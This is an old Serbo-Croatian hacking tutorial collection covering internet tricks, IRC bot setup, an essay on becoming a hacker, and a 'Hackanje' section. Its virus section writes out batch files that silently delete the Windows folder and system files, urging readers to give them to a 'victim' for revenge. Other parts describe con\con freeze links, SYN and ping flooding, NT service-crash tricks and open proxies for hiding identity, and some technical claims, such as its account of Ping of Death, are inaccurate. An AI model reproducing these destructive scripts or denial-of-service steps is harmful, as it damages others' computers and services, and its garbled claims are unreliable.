Internet Fazoni

Pravljenje Virusa

miRC Hack

Kako postati HACKER ?

Hackanje

Hack Web

Hackanje Sifre putem ftp.

Dos Hackanje

Crackanje

Windows Trikovi

™Dr.Rame™

-*-*-*--- Hakerski internet fazoni --*-*-*

* U ovom tutoru mozete naci neke veoma korisnefazone preko interneta. Neke takodjer mozete iskoristit u hakerske svrhe uglavnom to vi odlucite.

* Access denied (nekoj web stranici)

Zelite li da sprijecite pristup nekoj web stranicisa vašeg kompjutera? Editujte fajl HOSTS.SAM kojise nalazi u Windows folderu. Pošto je 127.0.0.1 vaša IP adresa, otkucajte adrese sajtove koje zelite da zablokirate za ovaj IP.

* Anonimnost na internetu

Identifikacija poziva je sjajna stvar, zar ne? Medjutim, kada se logujete na Internet, vašInternet provajder ce, ukoliko posjedujete"tonsku" centralu, zabiljeziti broj telefona sakojeg ste zvali što moze u nekim slucajevima dabude nezgodno. Ako vam se ovo ne svidja, dodajteispred broja telefona vašeg provajdera broj"*72#" (bez znaka navoda) i vaš broj telefona ce biti sakriven! Naravno, ova funkcija radi i kada zovete bilo koji broj putem fiksnog telefona.Napomena: nije provjereno na svim "tonskim" centralama

* Brisanje URL adrese u IE

Ukoliko zelite da izbrišete URL adrese u Internet Exploreru koje se pojavljuju u Address barumorate podesiti bazu registara. Idite doHKEY_CURRENT_USER \ Software \Microsoft \ Internet Explorer \ TypedURLs i tamo obrišite nepozeljne stavke.Putanja za Windows 2000 je HKEY_USERS \ S-1-5-21...\Software\Microsoft\InternetExplorer\TypedURLs

* Fazon u Outlook Express-u

Kada ubacujete mail attachment u Outlook Expressu,dijalog box vas uvijek vodi u neki folder u kojem,

naravno, nikad nije fajl koji zelite da 'zakacite'.Ako zelite ovo da promijenite uradite slijedece.Idite sa Regedit.exe na HKEY_CURRENT_ USER \ Software \ Microsoft \ Windows\CurrentVersion \ Explorer \ User Shell Folders. Kliknite dvaput na Personal key i otkucajte putanju vašeg omiljenog foldera. Restartujete OS.

* Combine and Decode u Outlook Expressu

Znate li za opciju Combine and Decode u Outlook Expressu?Selektujte više poruka drzeci CRTL ili SHIFT iidite do Message menija i stavke 'Combine and Decode...'.Dobit cete od svih selektovanih poruka jednu veliku poruku koju npr. mozete da štampate ili nešto slicno.

* Prevodjenje IP adrese

Ukoliko zelite da na najlakši nacin, bez upotreberaznih shareware-ova, prevedete IP broj (npr. 245.84.120.19) u nešto razumljivo i pamtljivo,idite u DOS i otkucajte NSLOOKUP [IP]

* Vas IP?

Da li zelite saznat vasu IP adresu kada se konektujete nainternet? Otidjite u MS-DOS, i u Windows folderuutipkajte: IPCONFIG

c:\windows\ipconfig

P.S. "Naravno ove fazone nisam ja otkrio, nego samo sakupioi ponesto jos dodao (objasnio itd...)

Pravljenje Virusa

Upoznavanje

Dobro došli u još jedan tutorial by BaCkSpAcE. Ovaj tutorial može Vam pomoći da pravite jednostavne viruse.

Ovdje neću pričati on nekoj naprednoj tehnologiji jer je ovaj tutorial za početnike. Pa ako ste "elite haker"

ne gubite ovdje vrijeme kad možete obarati sistem Micro$oft-a. hehe...Ovaj tutorial govori o jednostavnom brisanju fajlova. Pa ako ste se

nadali da ćete uništiti svijet, žao mi je ovaj tutorial nije za tebe.

DOS batch virusi

-su virusi koji se završavaju sa ekstenzijjom .bat. Mogu sadržavati DOS komande.

Da se malo vratimo kada je KISS vladao svijetom, DOS je bio savršeni OS.

DOS nije ni malo sličan Windowsu pa ga nije lako koristiti. Zato je Micro$oft mali

mini-jezik nazvan "batch file". Batch fajlovi su fajlovi koji sadrze komande koje će kompjuter slijediti.

I ako kažemo da izbrišemo čitav harddisk on će poslušati naredbu. SAda, jezik je nešto najlakše što treba naučiti

na putu da postaneš haker. Samo trebaš da imaš talenta. Sada treba da naučiš komande, ja ću neke izlistati ovdje:

Najkorisnije komande su:(molim Vas otvorite još jedan notepad ili word pad i zapišite komande jer će Vam kasnije trebati)

@echo off - ova komanda će reći kompjuteru da ne pokazuje sve što radi u datom trenutku. Dobro ako ne želite da user sazna šta program radi.

echo text ovdje - ova komanda će izbaciti riječi text ovdje na ekran. Recimo ako želite da stavite "ti papcino" na žrtvin ekran, onda bi napisao

echo ti papcinoLagano, zar ne?

cd\ - ova komanda bi rekla kompjuteru da se vrati na harddrive (u većini slučajeva C:\). Većinu

vremena ćete koristiti ovo. Kasnije ćete vidjeti zašto.

cd direktorij - ovo otvara direktorij. Pa recimo da ste tipkali komandu cd\ prije. Sada ste u c:\ zbog cd\ komande, jel tako?Onda recite

kompjuterucd windows i tada će kompjuter otvoriti direktorij windows sa c: drajva.

(c:/windows, znate, najvažniji direktorij osim ako nemate linux.)

RD direktorij - ova komanda će izbrisati direktorij. Ovo je teško objasniti. Ako ste na c:/windows, i koristili ste komandu RD windows

E pa neće raditi glupko, zato što direktorij windows nije u direktoriju c:/windows/ . Jedini način da ovo radi jeste da budete u c:\ .

Zato što je direktorij windows u c:\ . Nadam se da se niste izgubili ili zbunili. Ali ovo je teško objasniti potpunim

početnicima, jer ako koristite windows već neko vrijeme ovako jednostavne komande bi trebali kopčati.

Ako još ne shvatate pošaljite mi email: backspace_np@yahoo.com pa ću Vam pokušati detaljnije objasniti.

@del fajl - ova komanda briše odredjeni fajl u odredjenom direktoriju pa ako ste npr u c:/windows/ bilo koji fajl mozete izbrisati kao npr. @del

logo.sys

End - ova komanda završava i izlazi iz programa.

Sada kada znate osnovne komande možemo krenuti sa učenjem kako da ih pretvorimo u viruse.

Ja mislim da ljudi najbolje uče ako imaju primjer ispred sebe. Pa ću ja zato koristiti primjere.

Primjer br.1---------------

@echo offcd\

rd windowsecho TI glupane

echo hahahahhahahaecho imam te

echo Vidimo seecho Vozdrica

end--------------

Hajmo sad ovo analizirati:@echo off - govori kompjuter da ne izbacuje sve na ekran tako žrtva

ništa neće znati šta se dešava. hehehecd\ govori da se pomjeri u c:\ drajv.

rd windows - govori da deletuje direktorij windows iz c:\ . I to znači vozdra Windows. hahaha

Ostale komande echo TI glupane....govore kompjuteru....pogodite šta.End -završava program.

Do sada bi trebao da shvatiš kako ovi virusi rade.Ali samo zato što je naš tim velikodušan dat ću Vam još jedan primjer.

Primjer br.2--------------------

@echo offcd\

cd windows@del win.com@del win.ini

echo Pokušaj sad popravit kompjuter, -Mi u Boga vjerujemo-End

-------------------

Analiza virusa:@echo off - govori kompjuteru da bude miran

cd\ - govori kompjuteru da ide na c:\cd windows - govori kompjuteru da ide sa c:\ na c:\windows

@del win.com - govori kompjuteru da izbriše win.com iz direktorija windows

@del win.ini - govori kompjuteru da izbriše win.ini iz direktorija windowsecho Pokušaj sad popravit kompjuter, -Mi u Boga vjerujemo- Ako ne znaš

šta znači sad me ubijEnd - kraj

Nadam ste da ste zapisali osnovne komande u notepad ili šta već.Sada je vrijeme da saznate kako da sačuvate fajl, zar ne? Pa to je lako.U Notepadu ćete da kliknete na File> Save As> ukucajte ime fajla

koje Vi sami želite ali da na kraju upišete .bat(Npr. mojprogram.bat mojvirus.bat klikni.bat itd itd)

I onda ga posaljite na web ili ga dajte svojoj žrtvi on što treba da uradi jeste da ga pokrene i on je gotov.

UPOZORENJE: Nemojte sa ovim jednostavnim virusima neke veće kompanije uznemiravati jer ste onda nadrljali.

I ako Vi pokrenete taj svoj virus onda ste vi nadrapali.

Bilo kako bilo ovo je kraj ovog tutoriala. Nadam ste da ste uživali čitajući ga. Ja sam se zabavljao dok sam ga pisao.

Ovakve stvari, virusi bi trebali biti korišteni samo za osvetu.

miRC

E pa ovako da krenemo od samog pocetka ... znaci skinete miRC sa adrese http://www.mirc.com/get.html zatim instalirate ... startujete

idete na options (2 ikonica gore)

Zatim, /connect/add ... prvi red je "Description" tu upisite samo ime servera il' sta hocete sve jedno ... IRC Server (na kraju cu napisati listu svih YU i jos ponekih irc servera za koje znam) Port - obicno je 6667 -

group nista .. pass. - nista - add : ) i samo connect to IRC server.

Kada ste se povezali na server kucate /list da vidite sve kanale ... kliknete dva puta na zeljeni kanal i tamo ste ... komnda za ulazak na neki

kanal je "/join #kanal" ... =)

E,sad idemo na ono ... Kako da instaliram bota ? : )E,pa ovako ... da bi doveli bota na IRC morate da imate shell koji

podrzava EggDrop ... odma' zaboravite na one free shell-ove jer od toga nema nista ... vec nabavite nekako ... npr idite na irc.dal.net #shell

#shellx #shellz pa trgujte malo (retko ko nije prevarant) ; )www.egghelp.com ... skinite EggDrop koliko ja znam poslenja je

EggDrop1.6.6 ... a po meni najbolja 1.4.5 verzija : )Onda raspakujte eggdrop u neki direktorijum i sredite fajl

"eggdrop.conf" pod ovo "sredite" podrazumevam:Nick Bota,Realname,Server,ako hocete neku scriptu da dodate kao sto je

"bseen" ... i jos neke gluposti ... ako ste bas lame posaljite mi mail i poslacu vam sredjen conf file : )

Kada ste nabavili shell nakacite se na FTP ... host - host shell-a - user pass ... ma sta vam pisem ovo to valjda znate? : )

Nakacili ste se na shell ? prebacite EggDrop1.4.5.tar.gz na shellIdite u Start/run pa kucajte telnet : )

onda na connect/remote system i tu upisete host shell-a i port : )Ako je sve cool onda cool : )

kucajte ovako ...tar zxfv eggdrop.1.4.5.tar.gz (kompajlira)

nakaci se na ftp i prebaci "eggdrop.conf" u direktorijum "eggdrop1.4.5"vrati se na telnet i kucaj "cd eggdrop1.4.5" zatim ...

./configuremake

make install./eggdrop -m eggdrop.conf.dist

Nakacite se na server na kome je bot i kucajte /msg BOTnick helloonda ce on tu nesto smara da si ti owner itd ...

onda setuj pass /msg [botnick] pass "tvoj pass"... kucas /chat [BOTnick] ... trazice ti pass .... I TO JE TO : )

osnovne komande na botu ...Dodavanje usera - .+userBrisanje user .-user [Nick]

Dodavanje hosta .+host [nick] [host]Ako hoces da dovedes bota na neki kanal kucaj .+chan #kanal

A da zaboravih gore da napisem .. dodavanje flagova ... op - user, m - master, n - owner, a - auto op dovoljno za sada ... dodavanje flagova se

vrsi komandom .chattr [nick] +[jedan od navedenih gore] TO ti je dovoljno za sada detaljnije upustvo ces dobiti na adresi

www.egghelp.com

aaa vec mi je muka ... sad idemo na instaliranje BNC-a : ) znate ono 24h dnevno vas nick na irc-u : ) yeah : )

Logujete se na shell ... kao ono za bota : ) i kucate"lynx http://www.psychoid.lam3rz.de/psyBNC2.2.1.tar.gz"

on ce ga tu downloudujeDalje kucate ...

tar -zxvf psyBNC2.2.1.tar.gzcd psybnc

makemake menuconfig

makei ./psybnc pokrecete BNC i sve je spremno ... ukljucite miRC i

konektujete se na server i port koji ste setovali

KAKO SAKRITI IP ?!

Ukljucite miRC/options/Firewall ... chekirate "Use SOCKS firewall" Protocol - Socks4 | Host - AAubervilliers-101-2-1-63.abo.wanadoo.fr |

userID - nista | pass - nista |port - 1080 |

evo jos nekih koji rade po istom principu ...

host - mail.bias.bm | port - 1080host - 212.136.228.242 | port - 1080

host - server1.scottsbluff.sykes.com | port - 1080

... NickServ,ChanServ,MemoServ,SeenServ ...

.. Blah ovo je po meni shit ... bilo je bolje dok nije bilo chanserv-a .. ono dobijes op ... TakeOver ubacis bota i ql ; ) ali sta je tu je : )

Evo nekih osnovnih komandi koje bi trebalo da znate na BalcanNet-u .../msg nickserv register [pass] [email] - registrovanje nick-a

/msg chanserv register [#kanal] [pass] [opis kanala] - registrovanje kanala

/msg chanserv access [#kanal] add *!*ident@* [level] - dodavanje access-a

/msg memoserv real all - citanje poruka/msg seenserv seen [nick] - seen

Evo nekih servera :

BalcanNet

irc.drenik.netirc.yubc.net - po meni najbolji

irc.verat.netirc.rstel.net

irc.studio-b.co.yuirc.planetarion.co.yu

ima ih jos dosta al mislim da su ovi najbolji ... a da, portovi servera je 6667 ...

hmm koji jos znam ... ? a da ...irc.krstarica.co.yu:6667

irc.cg.yu:6667irc.tehnicom.net:6667

irc.miss-serbia.comi najveci irc.dal.net ...

irc.tupacforum.com:6667irc.zmajevi.net:6667

Kako postati HACKER!

Ovaj tekst nisam ja napisao nego "drakelord" ja sam ga samo prepisao na forum jer je DOBAR

Gotovo svaki put, kad surfam webom, ircam, citam usenet ili slicno,naidem na ljude koji razgovaraju o hakiranju, hakerima, sigurnosti islicnim temama. Svi novi (newbie) clanovi 'hack-scene' žele u biti

znati kako postati hackerom i žele to uciniti brzo. Stoga, ostvarujucitu želju ( koja je, vjerujem, nikla kad je doticni 'novak' gledao nekifilm na temu hackera, citao u novinama ili sl. ) prolaze kroz mnoge

komplikacije, primjerice:- na ircu, usenetu, forumima postavljaju mmnoga pitanja od

kojih su neka glupa (Kako da haknem Hotmail?) i neka pametna (Gdje da

nadem podrobnije informacije o strukturi TCP/IP skupine protokola?).- cesto niti ne uce programirati, a vec kooriste eksploite koje

niti razumiju, niti znaju zašto ih koriste i sl.- puno puta egoizam prevlada pa se dogode izgredi (svade s

iskusnijim korisnicima racunala), najcešce na ircu i slicnim servisimagdje se odvija 'real-time' direktna komunikacija

- zbog osobnih razloga koriste Denial-of-sservice alate i cinenepotrebnu štetu (ne znajuci niti kako je alat napisan i što

eksploatira)Prilikom tih komplikacija se cesto ponize pa promijene nadimak,

e-mail adresu i slicno. Ovaj tekst bi vjerovatno trebao reci 'novacima'što ciniti da se komplikacije ne dogadaju.

Izraz 'hacker' oznacava osobu koja uci jer VOLI uciti o racunalima.U mojem rjecniku, 'hacker' znaci isto što i 'majstor od zanata'. Majstor

nekog zanata radi svoj zanat tako dugo dok ga ne dovede do savršenstva.

U smislu hackera, to je osoba koja uci o nekom podrucju racunalne znanosti

tako dugo dok to podrucje ne dovede do savršenstva. Dakle, da je u teoriji

i praksi u tome postigao svoj maksimum. Hakiranje se odnosi na aktivnost

postizanja tog savršenstva.Izraz 'hacker' se cesto veže uz racunalnu sigurnost, no to ne morabiti. Može se vezati uz bilo koje polje racunalne znanosti - grafika,

programiranje, poslovna informatika, administriranje, itd.Svaki hacker spoznaje nove tehnike i vještine na svojem polju

djelovanja (npr. sigurnost). Te vještine prenosi na osobe koje su manjeiskusne ili pocetnike (npr. napiše tekst o tome što je novo spoznao, a dato drugi u njegovom polju djelovanja ne znaju). To ga cini onim što jest -

hackerom (npr. 'majstor racunalne sigurnosti').Od stecenog znanja, osoba mora imati i neke koristi - inace to

znanje ne služi nicemu. Ako se uci samo zato da se voli uciti, a nemaama baš nikakve koristi od stecenog znanja, onda se vrijeme i trud trošena krivo! Stoga, ako se uci bez veze, bez odredene i jasne svrhe, osoba

ne može biti majstor niti hacker. Primjerice:- Tim Backstone uci o racunalnoj grafici. Svaki dan spoznaje novevještine crtanja raznih oblika. On uci zato jer ocekuje da ce svojim

znanjem imati financijsku korist.- Gerald Winston je vec zaposlen kao Windoows programer. On uci o

UNIX sigurnosti u svoje slobodno vrijeme. Svrha njegovog ucenja je dapovisi reputaciju, tj. da njegov doprinos bude zabilježen u javnosti ida njegovo ime bude poznato šire nego vec jest, a to ce uciniti pišuci

tekstove i savjetujuci korisnike UNIXa.- Ivo Ladic je srednjoškolac. Polazi matemmaticku gimnaziju. Njega

fasciniraju kriptografski sustavi pa ih vjerno proucava. Posjecuje forumei dopisuje se s ljudima koji se bave kriptografskim sustavima. On to radi

jer se nada da ce tako dobiti posao u buducnosti.- Mica Kurtovic je takoder srednjoškolac. Polazi u opcu gimnaziju.

Njega zanima racunalna sigurnost i hackeri. On želi postati hackerom jerželi haknuti mnogo servera i postati slavan medu hackerima.Svi primjeri su izmišljeni, no, ocito je da Mica cini nešto krivo.

On od 'hakiranja' servera nece imati nikakvu korist, a kamo li slavu. Bitce oštecen:

- financijski (mrežna oprema, mnogo potroššenih impulsa...)- emocionalno (agresivnost i egoizam ce ojjacati)

- socijalno (društvo ce ga zanemariti, izggubit ce dosadašnjeprijatelje, a nove ce teško steci)

- 'reputacijski' tražit ce ga MUP, FBI, Innterpol... a to ovisi o aktivnostima (koje bi vjerovatno bile ilegalne)

Stoga, dragi moji lameri, newbaji, rookiji i svi koji želite postatihackerima, citajte me pažljivo.

Ako želite biti hackerom (na podrucju racunalne sigurnosti -najcešce), cinite ovako:

1. budite SIGURNI da to želite2. VJERUJTE da to možete

3. OCEKUJTE korist od svoje aktivnosti i rada (financijska,socijalna - novi prijatelji, reputacija - da postanete poznatiji, kao primjer

drugima ili slicno, ...)4. NADAJTE se da ce se ono što ocekujete ispuniti

5. USTRAJTE u toj aktivnosti jer treba vremena i truda dase postane hacker, odnosno 'majstor'

Sav materijal koji vam je potreban da postanete hacker možetenabaviti tako da pitate starije hackere. Primjerice, za racunalnu

sigurnostna podrucju UNIX-a idete, npr. IRC:

irc.dal.net:#unix: Molim vas lijepo, gdje da nadem informacijeo racunalnoj sigurnosti na podrucju UNIXa. Želio bih nauciti što je više

moguce o tome pa pitam vas koji znate više od mene.Ne bojte se reci da ste novi, da ne znate. Ako priznate da ne znate,

UVIJEK ce vam netko pomoci ako ŽELITE da vam se pomogne. Kineska poslovica

kaže:"Kad je ucenik spreman, pojavi se ucitelj."

Takoder, morate znati još nešto važno, a to je razlika izmeduinteligencije i pameti. Inteligencija je onaj dio vaše osobe koji

omogucujebolje, brže pamcenje informacija. Taj dio vam omogucuje da skupite

mnogopodataka o podrucju o kojem želite uciti. Inteligencija je ono što vam

je UROĐENO, što ste genetski nasljedili. Pamet (emocionalna inteligencija)

se stjece od rodenja, a na razvoj pameti utjece okolina (knjige, roditelji,prijatelji, baka, vrijeme, rat, tuca, plac, svade, smijeh, seks...). Pamet

covjek može mijenjati, buduci da na nju utjece okolina, a to cini tako damijenja okolinu, npr. ako je dosad bio izložen lošem utjecaju društva isam je bio alkoholicar, on odlucuje prestati uzimati alkohol, mijenjaprijatelje, posao, stan i sl. samo da bi promijenio (unaprijedio) svoju

pamet. Dakle,pamet se odnosi na 'spozaju svojih osjecaja' (zato se zove

*emocionalna*inteligencija).

*** Zašto je to važno u postajanju hackerom? ***

Vi morate imati oboje da bi postali hackerom. Morate imatiINTELEKT da bi upili potrebno znanje i morate imati PAMET da

bi znali da to želite, možete, da ste spremni preuzeti odgovornosti kojeaktivnost kojom se želite baviti donosi, itd. Ovo sam spomenuo jer

mnogivide ZERO_COOLa ili NEA s Matrixa i požele biti 'hax0r'. Ne-ne! Prvo,PAMET U GLAVU, a onda da vidite da li ste spremni na ono što vam ta

aktivnostkoju ste izabrali donosi. Na snove, zamišljanja o rušenju servera, slavikoju cete dobiti, filmove, MTV spotove, razgovore na IRCu i forumima i

sl.se NE OSLANJATI. U obavljanju pravog posla cesto nema

radosti, no treba je biti. Posao je napor i zato je veoma važno da birate ONO

za ŠTO STE SPOSOBNI. U svakom poslu ima padova i uspona. Shvatite svaki pad

kao korak bliže uspjehu/rješenju. Problemi su izazovi, a poslom se izazovi

prihvacaju. Koliko želite prihvatiti izazov i raditi? Koliko možete? Dali ste uopce sposobni za to? Razmislite još jednom. Vi birate!

"Znanje je poput kamena. Kamenom se mogu napraviti velikestvari ako ga dobro *upotrijebite*."

Hackanje

SADRZAJ:------------------

1. Con, Aux i Nul Exploit(by BaCkSpAcE)

2. SYN Flood Attack(by BaCkSpAcE)

3. Ping of Death(by BaCkSpAcE)

4. Exploit za NT 3.5x rachunare(by BaCkSpAcE)

5. Malo o NT

(by Perun)

6. Stvaranje backspace.bat fajla na serveru(by BaCkSpAcE)

7. Apache HTTP Server - Exploit(by Zeroo_Cool, modified by BaCkSpAcE)

8. PHP Path Revealing Vulnerability(downloaded from Rootshell, translated by BaCkSpAcE)

9. Sakrivanje IP broja u mIRCu(by BaCkSpAcE}

10. Trik u SoftICE za crackere koji nisu znali(by BaCkSpAcE)

========================================================

1. Con, Aux i Nul Exploit-----------------------------------------<

Ovi exploiti provereno rade na Win98 i Win98 SE ali u WinME nerade. Oni se javljaju pri ukucavanju sledecih komandi:

c:\con\conili c:\aux\auxili c:\nul\nul

Nakon ovoga rachunar ce da se zamrzne i jedino reshenje bicerebootovanje rachunara. Moze da se koristi npr. za Web, tako

shto napravite hiperlink do npr. c:\con\con i kada korisnik pritisnena to rachunar se zaledi ili slichno. Reshenje problema je skidanjezakrpe sa Micro$oftovog sajta ili da predjete na Linux, ako to vec

niste uradili.

========================================================

2. SYN Flood Attack---------------------------------

Shta je to SYN Flood Attack? To je ustvari jedna vrsta Denial ofService napada.Syn Attack radi tako shto napadach shalje zrtviSyn Request da se konektuje na server zrtve, a zrtva odgovarasa ACK, i rezervishe buffer (mesto u memoriji) za tu konekciju.Napadach neodgovara sa ACK nego shalje SYN Request ponovo,

i zrtva ponovo odgovara sa AK i odvaja buffer i sve tako dokzrtva neostane bez Buffer Space i krashira se. Ovom vrstom

necete naneti skoro nikakvu shtetu WebMasteru. On ce morati,posle SYN Flood Attacka, da rebootuje rachunar. NT je po defaultupodeshen da shalje SYN-ACK na 3,6,12,24 i 48-oj sekundi. Posle

slanja zadnjeg SYN-ACK, serveru je potrebno 96 sekundi da

dealocira prostor koji je bio zauzet. Znachi napadach ima foreukupno 3+6+12+24+48+96 = 189 sekundi.

========================================================

3. Ping of Death----------------------------

Ping of Death je isto jedna varijanta Denial of Service napada.Izvodi se tako shto cesh da otkucash 'ping adresa -n 9999999'i uz to treba da nadjesh rachunare sa brzim linijama.Tako su

gospoda koja je napala yahoo.com i uradila.Uzeli su par mocnihkompjutera na brzim linijama sa Stanford univerziteta i uradili'ping www.yahoo.com -n 9999999' i onda je ta linija kojom se

ulazi u Yahoo bila zakrchena velikom kolichinom podataka(skoro milion pingova) i niko nishta nije mogao uraditi.Naime,

kada se otkuca ova komanda, onda server pochinje da obradjujete podatke.Ali poshto je tu ima puno podataka server ce da dugodugo radi.Ali ako je to neki slabiji server(mislim na neke klasuispod Yahoo), onda ce taj rachunar zablokirati(mozda se chaki sam resetuje!).Znachi kod slabijih rachunara se dogodi Buffer

Overflow zbog kolichine podataka vece od njegovog buffera,ali Yahoo je jachi.Izashao je i patch za vecinu ugrozenih

sistema koji onemogucava Efekat Ping of Deatha.

========================================================

4. Exploit za NT 3.5x rachunare-----------------------------------------------------

a) Ako u toku rada DNSa telnetujete se na port 53 i ako ukucate10 ili vishe znakova i pritiskom na enter, DNS ce se zaustaviti.

b) Ako se u toku konekcije na Port 135 telnetujete i ukucate 10 ilivishe znakova i pritiskom na enter, onda ce se korishcenje

procesora popeti na 100%, shto znatno usporava performansesistema.

c) Ako se telnetujete na port 1031 i ako ukucate 10 ili visheznakova i pritisnete enter, onda ce se IIS zaustaviti.

d) Telnetovanjem na port 80 i ukucavanjem 'GET ../..' takodjece zaustaviti IIS.

========================================================

5. Malo o NT--------------------------------------------------------------

NT koristi jedan na objectima zasnovan model obezbedjenjasto znaci da se svaki fajl posebno moze obezbediti na serveru.

Model obezbedjenja u NT-u se sastoji iz cetiri dela:

1 Local Securitu Autority2 Security Account Manager3 Security Reference Monitor

4 User Interface -UI

NT koristi Server Message Block za kontrolu slanja podataka.OS od NT ima jedan poseban security nivo I zbog toga on

podrzava vise security-interface-a. Glavno pravilo kodobezbedjena NT sistema je -koristi zdrav razum (kao na primer

fizicko obezbedjenja servera ). Ovde je bitno naglasiti da NTima C2 certifikat Americkog Ministarsva za odbranu samo kao

stand-alone machina -bez diskete-drajva I neprikljucen namrezu. NT je prilicno zatvoren sistem ali ima jedno par slabostikoje hakeri obicno koriste ; Na primer shares - deljene particije

direktorijumi I fajlovi:- Ako kao administrator delite mape tako dda user Pera ima

kontrolu nad njima ,user Pera moze dalje da kontrolosedirektorijume I mape na kojima ima dovoljne privilegije stopostane prilicno nezgodno ako user Pera vise nije pravi user

Pera neko haker koji je na jedan od mnogobrojnih nacina preuzeonjegiv identitet.Zato je potrbno da se svaki share explicitno definira

I ne prihvataju defaul configuracije NT-a jer one omogucavajumalicioznom useru da npr. "hanguje" sever pod oderdjenim

okolnostima- Ako haker na jedan ili drugi nacin dobijje fizicki pristup serveru

on moze restartovati server sa DOS disketom I sa ntfsdos.exejedne Microsoftove aplikacije dobiti pristup na sve fajlove na

serveru ili radnoj stanici server - bez bilo kakve brige o priveligijamapravima na njima ..Takodje ako ima CD-ROM sa Linoxom na njemu odmoze da potuno over-raiduje obezbedjnje Servera iz Linuxa tako damu uopste nije potreban Administratorov ili bilo ciji drugi password.

Naredna slabost je kod davanja Full controll prava userima - jer podtim se podrazumeva jedno skriveno pravo koje se zove File Delete

child I koje je neizbrisivo iz Full control privilegija.Sa tim pravom usermoze da brise read-only files sto moze da bude prilicno nezgodno akosu ona kljucna za funkcuionisanje NT OS. Jedna od najvaznijih stvari

kod NT obezbedjnja je obezbediti grupu Administratora. Posto clanoviove grupe imaju neogranicenu kontrolu, haker ce prvo pokusati daprovali ovaj racun Ukoliko je on suvise dobro obezbedjen haker ce

pokusati da provali racun sa manjim privilegijama a onda sebe dodagrupi administratora (acces-promotion ili t.z.v. step-up attack).Jedan od najboljih nacina je sve clanove grupe administratora

prebaciti u novu grupu I njoj dati potuna prava (pod drugim imenom)a onda izbrisati ili ograniciti prava grupe administratora tako da hakernece znati kojoj grupi I pod kojim imenom mora pripadati da bi dobioprava administratora. Klasican napad krakera zapocinje time sto ce

sebi pokusati da pribavi password on nekod racuna koji nije tolikovazan (I obezbedjen) a kasnije pokusati sebe da promovira u racun

sa vise privilegija.Za ovo se koriste t.z.v. brute-power sistemi Iprogrami koji su nabavljivi djabe na Internetu I koji mogu da u roku

od 7 dana na prosecnoj machini krakrraju passworde I do 16 znakovadugacke. Za ovo haker mora da dodje do cipherteksta u password

fajlovima Ikoji se cuvaju na serveru u Sam fajlovima I za koje morada ima fizicki pristup serveru ili njegovoj fizickoj kopiji (rezervni

serveri - shadow sistemi) I tu dolazi vaznost fizickog pristupaserveru u prvi plan. Takodje ukljucivanje funkcije Account lockoutotezava posao hakeru (ali I administratoru ako je configuriran napremali broj pokusaja pa dobija non stop telefoncice od trapavih

usera koji su se zakljucali pogresnim tipkanjem passworda) takodjeI cool-out preiod ne sme biti previse dug jer haker to moze da koristiza t.z.v. denial of service napade. Takodje dobar racun-policu je namestu, cesto menjanje userovih passorda I prisiljavanje usera da

koriste passworde od najmanje 8 znakova I sa ukljucenjem brojeva,znakova itd kao I koriscenje bezbednisnih programa kao KSA (Kane

security monitor) umanjuju rizik od ovakvih napada. Zbog toga sto sestandardno ne moze ukluciti Account -lockout za Administratorov

racun on je jako ranjiv za ovakve vrste napada .Tu postoji par trikovada se to izbegne kao davanje drugog imena administratorovom

racunu kao prethodno objasnjeno I onda pravljenje novog usera saimenom administrator u dodavanjem njega grupi guests pa mu ondaudaris jedan veoma dugacak password I onda ukljucis audit (koji ne

postoji za administratora) I inda gledas sta se desava I ko svepokusava da provali (mamac) "administratorov" racun. Takodje I

zabranjvanje administraturu da se loguje preko networka nego samodirektno sa konzole umanjuje rizik. Iskljucivanje racuna Guest jetakodje preporuka jer preko njega haker moze da dodje do vaznih

fajlova u registry pod bilo kojim racunom I passwordom.To mu dajeveoma siroka prava I ne samo citanje veoma vaznih fajlova (kao na

primer password fajlova) vec I menjanje osobina fajlova (nprnotepad.exe u haker.exe) kao I pristup veoma vaznim kljucevima

(HKEY_CLASSES_ROOT, HKEY_LOCAL_MACHINE itd ..kao Iubacivanje Trojanaca na ovaj nacin koji mogu raditi gotovo sve kao

na primer slanje password fajlova pri restartovanju servera...Sto se napada sa networka tice najvaznije su slabosti koriscene kod

SMTP i HTTP protokola.Zato se bitno da ovi protokoli imaju samopristup (na user-nivou -onim fajlovima ili direktorijumima koji su

neophodni za njihov rad).Takodje I svi TCP/UDP portovoi izmedju 135I 139 treba da budu zacepljeni u vezi sa odbranom od napada

obaziranih na Secure Message blocks) Narocito kod networka kojekoriste SAMBU za komuniciranje sa Unix hostovima i serverima.

Stavljanjem Web servera koji imaju vezu sa internetom na posebansubnet zasticen firewallom kao I koriscenje internih firewallova zapoverljive servere je jako preporucljivo. Applikacije kao Alerter i

Messanger kao i koriscenje LAN Menadjera su potencijalne securityrupe jer koriste sisteme obezbedjnje koji su jako slabiji od NT-ovok

standardnog nivoa. Na CD-romu na NT4.0 Microsoft je greskompostavio program rollback.exe kojemu je namena bila da pomogneadministratorima da rediguju podatke u registriju ali umesto toga

brise sve u njemu.Najbolja opcija je izbrisati ovaj fajl ili u najmanjuruku promeniti mu ime u nesto nepogodivo da bi se izbegla

zloupotreba od hakera. Ukoliko imate masinu sa dual-butom (Unix,OS2, Novel ) virusi koji napdaju boot-sektor preko ovih drugih OS-ova

imaju uticaj i na NT (Obicno dobijas nesto kao :Boot device noraccesible). Takodje u SAMBA okruzenju sve r (remote) komande

trebalo bi biti iskljucene (rlogin,rsh,remsh, itd …). Ukoliko se NT severkoristi kao FTP server bolje je koristiti FTP od IIS 4.0 jer je bolje

zasticen nego standardni ftp od NT-a. Pri koriscenu RAS-a treba imatiu vidu da RAS sifruje samo password sa MD4-hash funkcijom (kojimoze biti snifovan) ostali podaci putuju networkom nesifrovani.

Ukoliko haker provali password a RAS server je povezan u domainnetwork on onda ima pristup celom domainu.Zato treba RAS uvek

izolovati na poseban firewallon zasticen network od ostatka LAN-a.Zbog toga su i aktiviranje audita, verifikacije,sifrovanja,call-back

funkcije nephodno radi zastite networka, specijalno u produkcionimsistemima i sa sistemima sa osetljivim informacijama.

FTP i Telnet passwordi putuju nesifrovani networkom jer ovi protokoline podrzavju ovu funkciju. Posto vecina usera koristi iste passwordei za logovanje na domeinu neophodnoje sa user-policy prisiliti usereda koriste razlicite passworde za ovu namenu. Sto se tice ranjivisti

TCP/UDP protokola kod NT-a to prilicno OK osim ranjivih portova od135-139 koji mogu da se koriste za denial-of-service napada kojom

haker zeli da postigne neke od sledecih rezultata:- Aktiviranje trojanca kojeg je ranije posstavio I koji postaje aktivan

tek posle reboot-a- Maskiranje hakerskih aktiviteta (snifovaanja, previsok-procenat ACK

paketa u networku, neobicno ponasanje procesora,)3

========================================================

